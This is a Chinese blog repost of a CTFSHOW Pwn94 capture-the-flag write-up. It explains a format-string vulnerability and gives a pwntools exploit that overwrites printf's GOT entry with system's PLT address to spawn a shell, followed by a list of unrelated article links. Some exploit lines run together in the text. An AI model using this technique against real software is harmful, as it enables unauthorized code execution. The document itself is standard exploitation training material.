当前位置: 首页 > ds >正文

CTFSHOW Pwn94 WP

ds 2025/8/23 13:35:53

checksec:

32位 保护只开了NX

IDA32打开 查看函数:

可以进行多次的printf

存在system函数 用格式字符串漏洞 fmtstr_payload工具 劫持printf GOT为system PLT函数

偏移为6

exp:

from pwn import *
context.log_level = 'debug'p = process('./pwn94')
elf = ELF('./pwn94')
printf_got = elf.got['printf']
system_plt = elf.plt['system']payload = fmtstr_payload(6, {printf_got:system_plt})
p.sendline(payload)
p.sendline(b'/bin/sh\x00')
p.interactive()

http://www.xdnf.cn/news/10150.html

相关文章:

  • [原创](Windows使用技巧): Windwos11如何设置局域网共享访问? (多图详解)
  • 在Linux上安装Docker并配置镜像加速器:从入门到实战
  • PostgreSQL 临时表空间
  • AWS API Gateway 配置WAF(中国区)
  • 《智慧医疗分级评价方法及标准(2025版)》征求意见函全面解读:人工智能医疗应用的评价体系与指南方向
  • 无线通信模块简介
  • 智能流体仿真软件AICFD 2025R1新版本功能介绍
  • 每日c/c++题 备战蓝桥杯(Cantor 表)
  • LangChain实战:MMR和相似性搜索技术应用
  • 【python深度学习】Day 40 训练和测试的规范写法
  • 【C++】C++面向对象设计的核心思想之一: 接口抽象、解耦和可扩展性
  • Python打卡训练营Day40
  • 半导体晶圆制造洁净厂房的微振控制方案-江苏泊苏系统集成有限公司
  • 如何迁移SOS数据库和修改sos服务的端口号
  • php:5.6-apache Docker镜像中安装 gd mysqli 库 【亲测可用】
  • Asp.Net Core FluentValidation校验框架
  • 3. JavaScript基础:自增自减、运算符优先级、条件语句、循环与错误处理
  • 跟我学c++中级篇——动态库的资源处理
  • 2025年渗透测试面试题总结-匿名[校招]红队攻防工程师(题目+回答)
  • 机器人变量类型与配置
  • 引领机器人交互未来!MANUS数据手套解锁精准手部追踪
  • 大数据量下的数据修复与回写Spark on Hive 的大数据量主键冲突排查:COUNT(DISTINCT) 的陷阱
  • Linux入门——入门常用基础指令(3)
  • 课程介绍:《ReactNative基础与实战指南2025》
  • 【前端优化】使用speed-measure-webpack-plugin分析前端运行、打包耗时,优化项目
  • 20250530-C#知识:万物之父Object
  • 云原生应用架构设计原则与落地实践:从理念到方法论
  • 通信算法之280:无人机侦测模块知识框架思维导图
  • JS 事件循环详解
  • 告别重复 - Ansible 配置管理入门与核心价值